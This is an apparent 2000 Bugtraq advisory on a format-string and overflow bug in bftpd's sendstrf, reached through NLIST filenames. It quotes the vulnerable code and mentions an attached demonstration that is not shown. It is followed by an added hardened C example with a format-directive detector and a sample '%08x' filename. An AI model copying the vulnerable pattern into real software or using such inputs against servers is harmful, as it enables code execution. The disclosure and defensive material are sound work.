Date: Wed, 6 Dec 2000 19:11:58 +0100
From: asynchro <asynchro@PKCREW.ORG>
Subject: Malformed vsprintf in bftpd
To: BUGTRAQ@SECURITYFOCUS.COM

There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf:

    int sendstrf(int s, char *format, ...)
    {
        ....
        vsprintf(buffer, format, val);

when the function is called from the NLIST command:

        else
            foo = 1;
        sendstrf(s, entry->d_name);
    }

This can be used to overflow the buffer of the vsprintf and execute arbitrary code. I don't think it can be normally used for a remote attack because bftpd removes all non-printable characters from input strings and so it is not possible to remotely put a shellcode in a filename.

A demonstrative code is attached.

asynchro@pkcrew.org
www.pkcrew.org

Attachment: bf-code.c
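As an added example, not from the original post and not bftpd's own code: the hardened form of the sendstrf/NLIST pattern described above, where the format is always a program literal, the directory entry is only ever an argument, and vsnprintf bounds the write. BUFSIZE, sendstrf_safe, nlist_line, last_reply and has_format_directive are names assumed here.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#define BUFSIZE 512   /* assumed reply buffer size, not taken from bftpd */
static char reply[BUFSIZE];   /* shared reply buffer, stands in for the socket */

/* Hardened counterpart of sendstrf: the format is always a literal owned by
 * the program, caller data only ever arrives as an argument, and vsnprintf
 * bounds the write. Returns the length, -1 on error, -2 if it would not fit. */
int sendstrf_safe(char *out, size_t outsz, const char *format, ...)
{
    va_list ap;
    int n;
    va_start(ap, format);
    n = vsnprintf(out, outsz, format, ap);
    va_end(ap);
    if (n < 0) return -1;
    if ((size_t)n >= outsz) return -2;   /* truncated: treat as failure */
    return n;
}

/* NLIST reply line for one directory entry, done the safe way: the entry
 * name is the argument to "%s", never the format itself. */
int nlist_line(const char *d_name)
{
    return sendstrf_safe(reply, sizeof reply, "%s\r\n", d_name);
}

const char *last_reply(void) { return reply; }

/* Review aid: does a string carry a conversion directive ("%d", "%x", ...;
 * "%%" is a literal percent)? Any value for which this returns 1 must never
 * reach the format parameter of a printf-family call. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        return 1;
    }
    return 0;
}

int main(void)
{
    const char *name = "report%08x.txt";   /* constructed sample filename */
    int n = nlist_line(name);
    printf("directive=%d len=%d line=%s", has_format_directive(name), n, last_reply());
    return 0;
}
```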